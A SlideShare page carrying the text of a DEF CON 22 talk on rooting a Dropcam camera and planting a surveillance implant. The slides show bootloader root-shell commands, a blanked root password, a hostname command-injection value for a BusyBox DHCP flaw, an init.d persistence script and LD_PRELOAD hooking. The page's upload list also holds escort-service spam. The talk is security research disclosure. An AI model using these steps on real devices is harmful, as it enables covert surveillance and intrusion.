Similar to Defcon 22-colby-moore-patrick-wardle-synack-drop cam (20)

04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
ONOS SDN Controller - Clustering Tests & Experiments
ONOS SDN Controller - Clustering Tests & Experiments ONOS SDN Controller - Clustering Tests & Experiments
ONOS SDN Controller - Clustering Tests & Experiments
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
Crash Dump Analysis 101
Crash Dump Analysis 101Crash Dump Analysis 101
Crash Dump Analysis 101
 
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersAlexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for Developers
 
Slackware Demystified [SELF 2011]
Slackware Demystified [SELF 2011]Slackware Demystified [SELF 2011]
Slackware Demystified [SELF 2011]
 
A CTF Hackers Toolbox
A CTF Hackers ToolboxA CTF Hackers Toolbox
A CTF Hackers Toolbox
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware Persistence
 
FreeBSD: Dev to Prod
FreeBSD: Dev to ProdFreeBSD: Dev to Prod
FreeBSD: Dev to Prod
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisApplication of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 

Recently uploaded (20)

SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 

Defcon 22-colby-moore-patrick-wardle-synack-drop cam

  • 2. optical surgery; implanting a dropcam colby moore / patrick wardle
  • 3. Synack Colby Moore (vrl/synack) Patrick Wardle (nasa/nsa/vrl/synack) Synack’s R&D team who we are
  • 4. > an outline overview root access vulnerabilities implant
  • 6. “Dropcam is a cloud-based Wi-Fi video monitoring service with free live streaming, two-way talk and remote viewing that makes it easy to stay connected with places, people and pets, no matter where you are.” (dropcam.com) cloud recording night vision two-way talk intelligent alerts
  • 8. > a target got a target on your back?! extremely popular found in interesting locations useful capabilities
  • 9. rooting a dropcam popping one of these #
  • 10. > probing some portz exposed 3.3v UART breakout board (FTDI serial to USB) serial connection (pin 3 & 4)
  • 11. > and action! password prompt $ screen /dev/tty.usbserial-A603NJ6C 115200 [0.000000] Linux version 2.6.38.8 (dropcambuild@linux-ws) (gcc version 4.5.2 (Sourcery G++ Lite 2011.03-41) ) [0.000000] CPU: ARMv6-compatible processor [4117b365] revision 5 (ARMv6TEJ), cr=00c5387f [0.000000] CPU: VIPT nonaliasing data cache, VIPT nonaliasing instruction cache ! ... ! ! ! .:^:. .o0WMMMMMNOc. lk, dWMMMMNXNMMMMWl .NMc dMMMMd. .kMMMMl .oOXNX0kWMc cX0xXNo .oOXNX0d' .0XxxKNNKx; :kKNNKx. .lOXNNKx, :XXxKNXOldKNNKd. KMMMO KMMM0 lWNd;',lXMMc oMMo'..dWNo,',oXWx .WMWk;',c0M0. .KMO:'':; ;NWx;',cKMK. lMMx'.oWMX;.'0MO OMMMW; cWMMMx .MM: .WMc oMX 'MM, 'WM;.WMd XMo kM0 KMx .WMd lMM' .XMo cMX .0MMMM0..cKMMMMk 0M0' .dMMc oMX .XMk' .xMX..WMK; .lWW, cWW: dMX, .oMMd lMM' .XMo cMX :XM0:dNMMMMO; oNMNKXMNWMc oMX .dNMNKXMNx. .WMWMNKXMWO' ;0WWKKWN, cKMNKXWWWMd lMM' .XMo cMK ;.0MMMMO, .;:;. ';. .;. .;:;. .WMo.,:;'. .,::,. .;:;'..;. .;; ,;. .;. 'ONx' .WM: .. ! Ambarella login:
  • 12. > accessing the bootloader bootloader $ screen /dev/tty.usbserial-A603NJ6C 115200 ! ___ ___ _________ _ / _ | / || ___ | | / /_ | . . || |_/ / ___ ___ | |_ | _ || |/| || ___ / _ / _ | __| | | | || | | || |_/ /| (_) || (_) || |_ _| |_/_| |_/____/ ___/ ___/ __| ---------------------------------------------------------- Amboot(R) Ambarella(R) Copyright (C) 2004-2007 ... amboot> power on hit ‘enter’
  • 13. > booting in a root shell set boot parameters to /bin/sh amboot> help The following commands are supported: help bios diag dump erase exec ping r8 r16 r32 reboot reset setenv show usbdl w8 w16 w32 bapi amboot> help setenv Usage: setenv [param] [val] sn - Serial number auto_boot - Automatic boot cmdline - Boot parameters auto_dl - Automatically try to boot over network tftpd - TFTP server address ... ! amboot>setenv cmdline DCSEC console=ttyS0 ubi.mtd=bak root=ubi0:rootfs rw rootfstype=ubifs init=/bin/sh ! amboot>reboot bootloader’s help bootloader’s setenv command
  • 14. > nop’ing out r00t’s password reset boot params # ls -l /etc/shadow /etc/shadow -> /mnt/dropcam/shadow ! # more /etc/fstab # /etc/fstab: static file system information. # # <file system> <mount pt> <type> # /dev/root / ext2 … # NFS configuration for ttyS0 /dev/mtdblock9 /mnt/dropcam jffs2 ! # mount -tjffs2 /dev/mtdblock9 /mnt/dropcam # vi /etc/shadow root:$1$Sf9tWhv6$HCsGEUpFvigVcL7aV4V2t.:10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: ! # more /etc/shadow root::10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: ! reboot root :)
  • 16. > the environment #uname -a Linux Ambarella 2.6.38.8 #80 PREEMPT Aug 2013 armv6l GNU/Linux ! # ps aux | grep connect 821 root 0:10 /usr/bin/connect 823 root 0:13 /usr/bin/connect 824 root 0:00 /usr/bin/connect linux (arm 32-bit) …and dropcam specific binaries
  • 17. > decently secure no open ports all communications secured unique provisioning
  • 18. > heartbleed (client side) # openssl version OpenSSL 1.0.1e 11 Feb 2013 openssl version yah,%this%is%vulnerable
  • 20. > busybox (cve-2011-2716) busybox: “is a multi-call binary that combines many common Unix utilities into a single executable” malicious%DHCP%server //unpatched%version
 case%OPTION_STRING:
 % memcpy(dest,%option,%len);
 % dest[len]%=%'0';
 %%%return%ret;% ;process%OPTION_STRING/OPTION_STRING_HOST% MOV%%%%R0,%R4%%%%%%%%%%% MOV%%%%R1,%R5%%%%%%%%%%% MOV%%%%R2,%R7%%%%%%%%%%% BL%%%%%memcpy%% % ;memcpy(dest,%option,%len)%% MOV%%%%R3,%#0% STRB%%%R3,%[R4,R7]%;dest[len]%=%'0';
 “host.com;evil%cmd” cve-2011-2716: “scripts (may) assume that hostname is trusted, which may lead to code execution when hostname is specially crafted” dropcam disassembly
  • 21. > ‘direct usb’ power on no%need%to%open%device!
  • 22. > OS X privilege escalation $ ls -lart /Volumes/Dropcam Pro/Setup Dropcam (Macintosh).app/Contents/MacOS/ ! -rwxrwxrwx 1 patrick staff 103936 Aug 12 2013 Setup Dropcam (Macintosh) drwxrwxrwx 1 patrick staff 2048 Aug 12 2013 .. drwxrwxrwx 1 patrick staff 2048 Aug 12 2013 . app%binary%is%world%writable! non-priv’d attacker on host infected dropcam app r00t == yes
  • 24. > the implant should… see hear infect command shell locate infil/exfil survey
  • 25. > conceptually corporate network “He sees you when you're sleeping He knows when you're awake He knows if you've been bad or good” (like the NSA? j/k)
  • 26. > finding the “brain” how does the dropcam, hear, see, and think? where is the brain?!
  • 27. > the connect binary the /usr/bin/connect binary is a monolithic program that largely contains the dropcam specific logic.
  • 28. > but it’s non-standardly packed…. $ hexdump -C dropCam/fileSystem/usr/bin/connect ! 00000000 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 28 00 01 00 00 00 a0 f5 06 00 34 00 00 00 |..(.........4...| 00000020 74 81 06 00 02 02 00 05 34 00 20 00 02 00 28 00 |t.......4. ...(.| 00000030 03 00 02 00 01 00 00 00 00 00 00 00 00 80 00 00 |................| 00000040 00 80 00 00 8c 7e 06 00 8c 7e 06 00 05 00 00 00 |.....~...~......| 00000050 00 80 00 00 01 00 00 00 90 5a 00 00 90 5a 14 00 |.........Z...Z..| 00000060 90 5a 14 00 00 00 00 00 00 00 00 00 06 00 00 00 |.Z..............| 00000070 00 80 00 00 7f d2 62 0c 55 50 58 21 04 09 0d 17 |......b.UPX!....| $ upx -d dropCam/fileSystem/usr/bin/connect Ultimate Packer for eXecutables ! UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 ! File size Ratio Format Name -------------------- ------ ----------- ----------- upx: connect: IOException: bad write ! Unpacked 1 file: 0 ok, 1 error. upx’d unpack error :/
  • 29. > packed connect packer stub was identified as NRV2E and identically matched source (armv4_n2e_d8.S) ! -> the stub was not modified/customized //elf%unpack%function
 void%PackLinuxElf32::unpack(OutputFile%*fo)
 {
 % ...
 
 %%%bool%const%is_shlib%=%(ehdrc>e_shoff!=0);% % //this%code%path%taken
 % if(is_shlib)
 % {
 % % % //exception%is%thrown%here upx%src;%p_lx_elf.cpp //elf%unpack%function
 #define%EI_NIDENT%16% typedef%struct%{
 % Elf_Char% e_ident[EI_NIDENT];
 % Elf32_Half%e_type;
 % Elf32_Half%e_machine;
 % Elf32_Word%e_version;
 % Elf32_Addr%e_entry;
 % Elf32_Off%e_phoff;
 % Elf32_Off%e_shoff;
 %%%%…
 }%Elf32_Ehdr;
  • 30. > generically unpacking connect connect is not a shared library …why is is_shlib true (due to e_shoff != 0)? //unset%ehdrc>e_shoff
 with%open(fileName,%'rb')%as%packedFile
 % fileBytez%=%list(packedFile.read())
 
 % #zero%out%ehdrc>e_shoff
 % fileBytez[SH_OFFSET:SH_OFFSET+SH_SIZE]%=%[0]*SH_SIZE $ python dropWham.py connect -unpack [+] unsetting ehdr->e_shoff [+] invoking UPX to unpack Ultimate Packer for eXecutables File size Ratio Format Name -------------------- ------ ----------- ----------- 890244 <- 426577 47.92% linux/armel connect Unpacked 1 file. ! 
 $ strings connect Dropcam Connect - Version: %d, Build: %d (%s, %s, %s) jenkins-connect-release-node=linux-144, origin/release/grains_of_paradise CONNECT_BUILD_INFO CONNECT_PLATFORM CONNECT_VERSION nexus.dropcam.com ... can use for evilz?!
  • 31. > the persistent core easy portable modules # du -sh 34.6M ! # less /etc/init.d/S40myservices ... tar -xvf python2.7-stripped.tgz -C /tmp/
 /tmp/bin/python2.7 /implant/cuckoo.py & ! cuckoo’s nest…something not enough space for python persist as init.d script- decompress custom python …and action!
  • 32. > networking C&C # netstat -t Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 1144 192.168.0.2:40978 ec2-54-196-21-142.compute-1.amazonaws.com:https ESTABLISHED tcp 0 1337 192.168.0.2:41988 ec2-54-196-21-130.compute-1.amazonaws.com:https ESTABLISHED which is legit? ;) command and control channel streaming channel dropcam/cuckoo’s egg connections
  • 35. > host infection this is the (implanted) device! renamed (original) binary OS X kindly hides app details
  • 36. > host infection (OS X) XProtect Gatekeeper OSX Sandbox Code Signing he wins! <
  • 37. > audio and video /usr/bin/connect kernel mode conceptually more specifically
  • 38. > injection the connect binary exclusively opens both the audio card # arecord arecord: audio open error ! Device or resource busy connect’s-process space kernel mode injected module # LD_PRELOAD=./injectMe.so /usr/bin/connect module injection no sharing
  • 39. > hooking //blah
